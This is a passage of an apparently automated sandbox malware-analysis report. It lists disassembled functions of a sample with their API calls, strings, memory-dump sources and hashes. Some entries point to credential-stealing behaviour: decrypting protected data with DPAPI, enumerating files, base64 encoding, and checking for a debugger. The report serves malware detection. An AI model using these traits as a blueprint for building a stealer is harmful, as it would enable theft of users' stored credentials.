Instruction Fuzzy Hash: 40712A317062259BEB04DF25DC89A6F73B5FB86328F544639E83687A90EB30DD41C792

Function 6C646C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C5F1C6F,00000000,00000004,?,?), ref: 6C646C3F

Part of subcall function 6C69C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C69C2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C5F1C6F,00000000,00000004,?,?), ref: 6C646C60
PR_ExplodeTime.NSS3(00000000,6C5F1C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C5F1C6F,00000000,00000004,?,?), ref: 6C646C94

Strings

gfff, xrefs: 6C646D30
gfff, xrefs: 6C646CF5
gfff, xrefs: 6C646CFD
gfff, xrefs: 6C646D66
gfff, xrefs: 6C646D9C

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 944ece138954b9b5a8ad7ace61adaa09c62b691064fa9516fccc397068bfeef6
Instruction ID: 203875daaf0ab6e7f2c1aee8f9975be2937c4837c6141082dc0d630f887319b2
Opcode Fuzzy Hash: 944ece138954b9b5a8ad7ace61adaa09c62b691064fa9516fccc397068bfeef6
Instruction Fuzzy Hash: AE513B72B016494FC71CCEADDC926DAB7DAABE4310F48C23AE442DB781D678D906C751

Function 6C6C0F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C6C1027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C6C10B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6C1353

Strings

%lld, xrefs: 6C6C114B
zeroblob(%d), xrefs: 6C6C1223
-- , xrefs: 6C6C0FF5
NULL, xrefs: 6C6C119E
'%.*q', xrefs: 6C6C1217, 6C6C1292
$, xrefs: 6C6C12A0
%02x, xrefs: 6C6C12F6

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: 8d21adec7a19f874e8c97e4d19f5d211c6c5b3fb3ec2a3e6efde94de445a7213
Instruction ID: eb8989827c2dc0924352b5db012e1ca92fa96ece7cee08a9d996368f1dafa13d
Opcode Fuzzy Hash: 8d21adec7a19f874e8c97e4d19f5d211c6c5b3fb3ec2a3e6efde94de445a7213
Instruction Fuzzy Hash: EEE18C71A083409FD710CF58C880AABBBF1EF86358F14892DE99987B51E775E885CB47

Function 00EED570 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00EF8560: lstrcpy.KERNEL32(00EFE4C7,00000000), ref: 00EF85A8

Part of subcall function 00EF87D0: lstrlen.KERNEL32(?,00EFE98C,?,00000000,00EFE4C7), ref: 00EF87E5
Part of subcall function 00EF87D0: lstrcpy.KERNEL32(00000000), ref: 00EF8824
Part of subcall function 00EF87D0: lstrcat.KERNEL32(00000000,00000000), ref: 00EF8832

Part of subcall function 00EF86C0: lstrcpy.KERNEL32(?,00EFE4C7), ref: 00EF8725

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00EFE742), ref: 00EED5BE
StrCmpCA.SHLWAPI(?,00EFED18), ref: 00EED60E
StrCmpCA.SHLWAPI(?,00EFED1C), ref: 00EED624
FindNextFileA.KERNEL32(000000FF,?), ref: 00EEDB3A
FindClose.KERNEL32(000000FF), ref: 00EEDB4C

Strings

\*.*, xrefs: 00EED586

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: 3ac182cd4ef2d331f104b734f005be6731fc176d82df5fd2ce4fd2087d2db1f9
Instruction ID: b4304fa8507a03d73f818c8072c93db1945f5adf22ae481e3ce344b86910421e
Opcode Fuzzy Hash: 3ac182cd4ef2d331f104b734f005be6731fc176d82df5fd2ce4fd2087d2db1f9
Instruction Fuzzy Hash: AEF18A7181411C9ACF19FF60DD95AFEB3B8AF54300F5161DAA21AB2491EF706B88CF51

Function 6C6C8FB0 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C6C8FEE
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6C90DC
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6C9118
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6C915C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6C91C2
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6C9209

Strings

UUUU, xrefs: 6C6C9255
3333, xrefs: 6C6C925E

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: 3333$UUUU
API String ID: 1967222509-2679824526
Opcode ID: 8921df6bd3d81bb04e9f79625aaa174f0e47ba00c688987dd15cf315cbdb38aa
Instruction ID: 285a16f36445682598c47b3330bdd522a72cee1fac95babf538a378d397bdf4a
Opcode Fuzzy Hash: 8921df6bd3d81bb04e9f79625aaa174f0e47ba00c688987dd15cf315cbdb38aa
Instruction Fuzzy Hash: 18A19D72F001159BDB04CB68CC84BAEB7B5FB48328F194169E909B7381E736EC51CBA5

Function 6C708D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C7514E4,6C6BCC70), ref: 6C708D47
PR_GetCurrentThread.NSS3 ref: 6C708D98

Part of subcall function 6C5E0F00: PR_GetPageSize.NSS3(6C5E0936,FFFFE8AE,?,6C5716B7,00000000,?,6C5E0936,00000000,?,6C57204A), ref: 6C5E0F1B
Part of subcall function 6C5E0F00: PR_NewLogModule.NSS3(clock,6C5E0936,FFFFE8AE,?,6C5716B7,00000000,?,6C5E0936,00000000,?,6C57204A), ref: 6C5E0F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C708E7B
htons.WSOCK32(?), ref: 6C708EDB
PR_GetCurrentThread.NSS3 ref: 6C708F99
PR_GetCurrentThread.NSS3 ref: 6C70910A

Strings

%u.%u.%u.%u, xrefs: 6C708E74

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: b71905694361a5c3efd8663172bfa14ba87e9ffb9bdeb2b1635c4198482f6d3a
Instruction ID: eef8b4ecc93a0a294ecfa9c37ad1ed26167bb52ca129311ea65fe469239e7bc6
Opcode Fuzzy Hash: b71905694361a5c3efd8663172bfa14ba87e9ffb9bdeb2b1635c4198482f6d3a
Instruction Fuzzy Hash: 1902BC71B052518FDB18CF19C568766BBF2EFA2344F29826EC8919BB92C371E905C790

Function 6C58EFB0 Relevance: 12.1, Strings: 9, Instructions: 815COMMON

Download Yara Rule

Strings

view, xrefs: 6C58F061, 6C58F071, 6C58FAB7
temporary table name must be unqualified, xrefs: 6C58F734
%s %T already exists, xrefs: 6C58FAC8
there is already an index named %s, xrefs: 6C58F9D7
not authorized, xrefs: 6C58F957, 6C58F9BA
sqlite_temp_master, xrefs: 6C58F0A6, 6C58F2D5
table, xrefs: 6C58F05C, 6C58FABC, 6C58FAC7
authorizer malfunction, xrefs: 6C58F95C, 6C58F9BF, 6C58FA5E, 6C58FA8B
sqlite_master, xrefs: 6C58F0AB, 6C58F2DA, 6C58F757, 6C58F93E

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: %s %T already exists$authorizer malfunction$not authorized$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 3168844106-1126224928
Opcode ID: 40ccc3bc61c63a8ad1e71de383beafe929dd7d7813a4c603125a3c3860cceced
Instruction ID: decf017e983f8939c67a541b79969e35b5925b3898e75a99c448066ae8638b10
Opcode Fuzzy Hash: 40ccc3bc61c63a8ad1e71de383beafe929dd7d7813a4c603125a3c3860cceced
Instruction Fuzzy Hash: BA729070E05225CFDB14CF69C884BAABBF1BF8D308F1482A9D8159B752D775E846CB90

Function 6C5D0820 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 1448COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000001,00000001), ref: 6C5D11D2

Strings

not authorized, xrefs: 6C5D175E, 6C5D1763
rows deleted, xrefs: 6C5D17D2
authorizer malfunction, xrefs: 6C5D1BD2
@, xrefs: 6C5D0B17

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: memset
String ID: @$authorizer malfunction$not authorized$rows deleted
API String ID: 2221118986-4041583037
Opcode ID: cfaddb66116d8fd19747b156d21ebc399a5ea3d57cb2e65b450a083c8f7b594f
Instruction ID: 9aed2710da3d63d01ac867336b6267ad3bbbed49e57c56630e75ef4bef8f2f44
Opcode Fuzzy Hash: cfaddb66116d8fd19747b156d21ebc399a5ea3d57cb2e65b450a083c8f7b594f
Instruction Fuzzy Hash: A5D27A70E04349CFDB14CFA9C880B9EBBB1BF89318F25825AD415ABB51D771B856CB84

Function 00EF6DB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58encryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(00000000,^N,40000001,00000000,00000000), ref: 00EF6DD0

Strings

^N, xrefs: 00EF6DC8, 00EF6E24, 00EF6DCB, 00EF6E27

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID: ^N
API String ID: 80407269-1324958562
Opcode ID: 272d7634dc0d62b985eb0a92f72b73617a8bcd64d07eed36eeadbd01c7545a8a
Instruction ID: cafa1d48af6c0efa963ecc2f23b875acffccbb7f2d2c6b5926b1efc0fbe8e573
Opcode Fuzzy Hash: 272d7634dc0d62b985eb0a92f72b73617a8bcd64d07eed36eeadbd01c7545a8a
Instruction Fuzzy Hash: 26113375200208BFCB04DF64C885FBA37B9AF89704F109018FA199B354C372EE91CB60

Function 6C604420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6C604444
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C604466

Part of subcall function 6C651200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C5F88A4,00000000,00000000), ref: 6C651228
Part of subcall function 6C651200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C651238
Part of subcall function 6C651200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C5F88A4,00000000,00000000), ref: 6C65124B
Part of subcall function 6C651200: PR_CallOnce.NSS3(6C752AA4,6C6512D0,00000000,00000000,00000000,?,6C5F88A4,00000000,00000000), ref: 6C65125D
Part of subcall function 6C651200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C65126F
Part of subcall function 6C651200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C651280
Part of subcall function 6C651200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C65128E
Part of subcall function 6C651200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C65129A
Part of subcall function 6C651200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6512A1

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C60447A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C60448A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C604494

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
String ID:
API String ID: 241050562-0
Opcode ID: 8f1578ef4250e3cf11eb678748b90f4bcccaaf5a87630242f02b8fe901b60c75
Instruction ID: 2a473ee28d46719c035dbddb30ddd17830367809fbf17fb53993675397ca430d
Opcode Fuzzy Hash: 8f1578ef4250e3cf11eb678748b90f4bcccaaf5a87630242f02b8fe901b60c75
Instruction Fuzzy Hash: 5D1193B2E007049BD720CF259D805A7B7F8FF692187048F2EE98D52A00F371B5988795

Function 00EF936E Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00EFA666
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00EFA67B
UnhandledExceptionFilter.KERNEL32(00EFD690), ref: 00EFA686
GetCurrentProcess.KERNEL32(C0000409), ref: 00EFA6A2
TerminateProcess.KERNEL32(00000000), ref: 00EFA6A9

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: a4c60eff08ce5f133530c128f542cef48f1d8f1e8e9f983432658b0dd83550db
Instruction ID: e72ceff0213eaefcec389d432c2e47893c85823c08dc3420df737e2851dea0e2
Opcode Fuzzy Hash: a4c60eff08ce5f133530c128f542cef48f1d8f1e8e9f983432658b0dd83550db
Instruction Fuzzy Hash: 9B21F6B8911B0CDFCB00DF55FD486A63BF5BB08B09F545019E50897261E7F05A85EF49

Function 00EE6C40 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,00EE7690,80000001,00EF42AE,?,?,?,?,?,00EE7690), ref: 00EE6C4D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00EE7690,80000001,00EF42AE,?,?,?,?,?,00EE7690,?), ref: 00EE6C54
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00EE6C81
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,00EE7690,80000001,00EF42AE), ref: 00EE6CA4
LocalFree.KERNEL32(?,?,?,?,?,?,00EE7690,80000001,00EF42AE,?,?,?,?,?,00EE7690,?), ref: 00EE6CAE

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 51ae82475284799b233f9929fefb945590761c2a2169e40708a0ab32de76839d
Instruction ID: 574fb91762d8d668aa886533cf1b8ad1f0b7cdaa7027bead3f11352b4dbfe814
Opcode Fuzzy Hash: 51ae82475284799b233f9929fefb945590761c2a2169e40708a0ab32de76839d
Instruction Fuzzy Hash: E8010C75A80308BBDB14DB94CD46FAE7779EB44B04F204558F715BB2C4D6B0AA40CB65

Function 6C70CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C70D086
PR_Malloc.NSS3(00000001), ref: 6C70D0B9
PR_Free.NSS3(?), ref: 6C70D138

Strings

>, xrefs: 6C70CF5B

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 4e3f765a807a031e5ca96bfade8a3a8cb44e2c86646ef7f4d3de4109c6075283
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 61D19EE2B407460BFB14497C8EA13EA77D787623B4F584339D1218BBE6E919C843C31A

Function 6C58AC60 Relevance: 6.4, Strings: 5, Instructions: 181COMMON

Download Yara Rule

Strings

ppl, xrefs: 6C58ADA7
winUnlockReadLock, xrefs: 6C58AE9F
winUnlock, xrefs: 6C58AE18
0pl, xrefs: 6C58ACC0, 6C58AD22, 6C58AD5E, 6C58AE45
Ppl, xrefs: 6C58ADDB, 6C58ADF5, 6C58AE6A

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID:
String ID: 0pl$Ppl$ppl$winUnlock$winUnlockReadLock
API String ID: 0-3997688460
Opcode ID: 8a52051bf07bee6841ff4c8674fbfc3cf6e9e1076b20d6f44c2df0410804fd74
Instruction ID: 46ef5deb1bf307d5ee499701e39334dfed0ea256ce26187abac3ada4b9141932
Opcode Fuzzy Hash: 8a52051bf07bee6841ff4c8674fbfc3cf6e9e1076b20d6f44c2df0410804fd74
Instruction Fuzzy Hash: 617190706092449FDB04DF28D884AABBBF5FF89314F14CA29F99997241E730E985CBD1

Function 6C6AAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 147201e682bebf19868f74799d35895f518992c9d45ff574f05e98d2dabac89d
